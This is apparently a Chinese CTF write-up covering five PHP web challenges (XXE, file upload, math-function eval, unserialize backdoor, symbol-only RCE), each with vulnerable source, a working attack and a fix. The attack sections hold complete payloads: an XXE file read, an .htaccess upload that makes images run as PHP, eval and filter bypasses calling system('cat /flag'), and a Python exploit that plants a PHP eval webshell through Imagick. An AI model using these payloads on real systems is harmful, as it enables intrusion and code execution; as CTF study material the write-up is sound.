某内部awdp测试赛

本文最后更新于 2024年6月5日 下午

ezXXE

附件:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
  error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
  $dom = new DOMDocument();
  $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
  $creds = simplexml_import_dom($dom);
  $tzzzez = $creds->tzzzez;
  echo $tzzzez;
}
//hint: flag in /flag
highlight_file(__FILE__);

break

有回显xxe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST / HTTP/1.1
Host: 182.92.117.61:48279
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://mitm/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

<?xml version="1.0"?>
<!DOCTYPE payload [
<!ELEMENT payload ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<creds>
<tzzzez>&xxe;</tzzzez>
</creds>

fix

libxml_disable_entity_loader(false);改为libxml_disable_entity_loader(true);
禁用外部实体
方案二、过滤用户提交的XML数据 关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $xmlfile = preg_replace('/<!DOCTYPE.*?>/i', '',$xmlfile);
    $xmlfile = preg_replace('/<!ENTITY.*?>/i', '',$xmlfile);
    $xmlfile = preg_replace('/SYSTEM.*?>/i', '',$xmlfile);
    $xmlfile = preg_replace('/PUBLIC.*?>/i', '',$xmlfile);
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $tzzzez = $creds->tzzzez;
    echo $tzzzez;
}
//hint: flag in /flag
highlight_file(__FILE__);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $xmlfile = preg_replace('/<!DOCTYPE.*?>/i', '',$xmlfile);
    $xmlfile = preg_replace('/<!ENTITY.*?>/i', '',$xmlfile);
    $xmlfile = preg_replace('/SYSTEM.*?>/i', '',$xmlfile);
    $xmlfile = preg_replace('/PUBLIC.*?>/i', '',$xmlfile);
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $tzzzez = $creds->tzzzez;
    echo $tzzzez;
}
//hint: flag in /flag
highlight_file(__FILE__);

easyupload

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
<?php
  header("Content-type: text/html;charset=utf-8");

error_reporting(1);

define("WWW_ROOT",$_SERVER['DOCUMENT_ROOT']);
define("APP_ROOT",str_replace('\\','/',dirname(__FILE__)));
define("APP_URL_ROOT",str_replace(WWW_ROOT,"",APP_ROOT));
define("UPLOAD_PATH", "upload");
?>
<?php



$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
  if (file_exists(UPLOAD_PATH)) {
    $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
    $file_name = trim($_FILES['upload_file']['name']);
    $file_ext = strrchr($file_name, '.');
    $file_ext = strtolower($file_ext); //转换为小写
    $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
    $file_ext = trim($file_ext); //收尾去空

    if (!in_array($file_ext, $deny_ext)) {
      $temp_file = $_FILES['upload_file']['tmp_name'];
      $img_path = UPLOAD_PATH.'/'.$file_name;
      if (move_uploaded_file($temp_file, $img_path)) {
        $is_upload = true;
      } else {
        $msg = '上传出错!';
      }
    } else {
      $msg = '此文件不允许上传!';
    }
  } else {
    $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
  }
}
  ?>


  <div id="upload_panel">
    <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
      <p>请选择要上传的图片:<p>
        <input class="input_file" type="file" name="upload_file"/>
        <input class="button" type="submit" name="submit" value="上传"/>
    </form>
    <div id="msg">
      <?php 
      if($msg != null){
        echo "提示:".$msg;
      }
      ?>
    </div>
        <div id="img">
          <?php
          if($is_upload){
            echo '<img src="'.$img_path.'" width="250px" />';
          }
          ?>
        </div>
            </div>

break

上传配置文件.htaccess

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
POST / HTTP/1.1
Host: 182.92.117.61:46036
Upgrade-Insecure-Requests: 1
Origin: http://182.92.117.61:46036
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1CqD56xsbSxgA2L0
Referer: http://182.92.117.61:46036/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Length: 339

------WebKitFormBoundary1CqD56xsbSxgA2L0
Content-Disposition: form-data; name="upload_file"; filename=".htaccess"
Content-Type: application/octet-stream

AddType application/x-httpd-php .png
------WebKitFormBoundary1CqD56xsbSxgA2L0
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundary1CqD56xsbSxgA2L0--

上传png图片🐎

fix

黑名单加上.htaccess后缀

1
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini",".htaccess");

math

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

break

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /f*

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
echo base_convert(37907361743,10,36);
echo "\n";
echo dechex(1598506324);
echo "\n";
echo base_convert(37907361743,10,36)(dechex(1598506324));
?>

//
hex2bin
5f474554
_GET

$pi=_GET
$$pi=$_GET
($$pi){pi}(($$pi){cos})=$_GET{pi}($_GET{cos})

fix

黑名单加上大{}和$
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '‘, ‘[‘, ‘]‘,’{‘,’}‘,’$‘];`

backdoor

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
error_reporting(E_ERROR);
class backdoor {
    public $path = null;
    public $argv = null;
    public $class = "stdclass";
    public $do_exec_func = true;
    
    public function __sleep() {
        if (file_exists($this->path)) {
            return include $this->path;
        } else {
            throw new Exception("__sleep failed...");
        }
    }

    public function __wakeup() {
            if (
                $this->do_exec_func && 
                in_array($this->class, get_defined_functions()["internal"])
            ) {
                    call_user_func($this->class);
            } else {
                $argv = $this->argv;
                $class = $this->class;
                
                new $class($argv);
            }
    }
}


$cmd = $_REQUEST['cmd'];
$data = $_REQUEST['data'];

switch ($cmd) {
    case 'unserialze':
        unserialize($data);
        break;
    
    case 'rm':
        system("rm -rf /tmp");
        break;
    
    default:
        highlight_file(__FILE__);
        break;
}

break

 call_user_func($this->class);可以触发无参函数并且要在自带函数里面
构造
cmd=unserialze&data=O:8:"backdoor":4:{s:4:"path";s:14:"/var/www/html/";s:4:"argv";N;s:5:"class";s:7:"phpinfo";s:12:"do_exec_func";b:1;}
可以触发phpinfo

要触发__sleep来利用include包含文件
https://github.com/AFKL-CUIT/CTF-Challenges/blob/master/CISCN/2022/backdoor/writup/writup.md
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/python3
#coding:utf-8

import re
import sys
import time
import requests

timeout = 30

host = '182.92.117.61'
port = '48267'

url = f"http://{host}:{port}"
write_session_payload = "O%3A8%3A%22backdoor%22%3A3%3A%7Bs%3A14%3A%22%00backdoor%00argv%22%3Bs%3A17%3A%22vid%3Amsl%3A%2Ftmp%2Fphp%2A%22%3Bs%3A15%3A%22%00backdoor%00class%22%3Bs%3A7%3A%22imagick%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A0%3B%7D"
session_sleep_chain_payload = "O%3A8%3A%22backdoor%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22session_start%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A1%3B%7D"

def rm_tmp_file():
    headers = {"Accept": "*/*"}
    requests.get(
        f"{url}/?cmd=rm",
        headers=headers
    )

def upload_session():
    headers = {
        "Accept": "*/*",
        "Content-Type": "multipart/form-data; boundary=------------------------c32aaddf3d8fd979"
    }
    data = "--------------------------c32aaddf3d8fd979\r\nContent-Disposition: form-data; name=\"swarm\"; filename=\"swarm.msl\"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n <read filename=\"inline:data://image/x-portable-anymap;base64,UDYKOSA5CjI1NQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADw/cGhwIGV2YWwoJF9HRVRbMV0pOz8+fE86ODoiYmFja2Rvb3IiOjI6e3M6NDoicGF0aCI7czoxNDoiL3RtcC9zZXNzX2Fma2wiO3M6MTI6ImRvX2V4ZWNfZnVuYyI7YjowO30=\" />\r\n <write filename=\"/tmp/sess_afkl\" />\r\n</image>\r\n--------------------------c32aaddf3d8fd979--"
    try:
        requests.post(
            f"{url}/?data=O%3A8%3A%22backdoor%22%3A3%3A%7Bs%3A14%3A%22%00backdoor%00argv%22%3Bs%3A17%3A%22vid%3Amsl%3A%2Ftmp%2Fphp%2A%22%3Bs%3A15%3A%22%00backdoor%00class%22%3Bs%3A7%3A%22imagick%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A0%3B%7D&cmd=unserialze",
            headers=headers, data=data
        )
    except requests.exceptions.ConnectionError:
        pass

def get_flag():
    cookies = {"PHPSESSID": "afkl"}
    headers = {"Accept": "*/*"}
    response = requests.get(
        f"{url}/?data=O%3A8%3A%22backdoor%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22session_start%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A1%3B%7D&cmd=unserialze&1=system('cat /flag');", 
        headers=headers, cookies=cookies
    )
    return  response.text

# 主逻辑
if __name__ == '__main__':
    rm_tmp_file()
    upload_session()

    time.sleep(1)

    print(get_flag())

fix

直接删除 new $class($argv);

fuzzyrce

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
  highlight_file(__FILE__);
error_reporting(0);
include ("check.php");
if (isset($_GET['w1key'])) {
  highlight_file(__FILE__);
  $w1key = $_GET['w1key'];
  if (is_numeric($w1key) && intval($w1key) == $w1key && strlen($w1key) <= 3 && $w1key > 999999999) {
    echo "good";
  } 
  else {
    die("Please input a valid number!");
  }
}
if (isset($_POST['w1key'])) {
  $w1key = $_POST['w1key'];
  strCheck($w1key);
  eval($w1key);
}
  ?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
function strCheck($w1key)
{
    
    if (is_string($w1key) && strlen($w1key) <= 83) {
        if (!preg_match("/[1-9a-zA-Z!,@#^&%*:{}\-<\?>\"|`~\\\\]/",$w1key)){
            return $w1key;
        }else{
            die("黑客是吧,我看你怎么黑!");  
        }
    }
    else{
        die("太长了");      
      }
    }

break

1
2
3
4
5
6
7
8
9
10
11
12
POST /index.php HTTP/1.1
Host: 182.92.117.61:40746
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://mitm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

w1key=%24_%3D(_%2F_._)%5B0%5D%3B%24__%3D%2B%2B%24_%3B%24_0%3D%2B%2B%24_.%24__%3B%2B%2B%24_%2F%2B%2B%24_%3B%24_%3D_.%24_0.%3D%2B%2B%24_.%2B%2B%24_%3B%24%24_%5B0%5D(%24%24_%5B_%5D)%3B&0=system&_=tac /flag

fix

删除eval

CTFs > 比赛Write Up
#比赛Write Up
某内部awdp测试赛
http://example.com/2024/06/05/某内部awdp测试赛/
作者
J_0k3r
发布于
2024年6月5日
许可协议
BY J_0K3R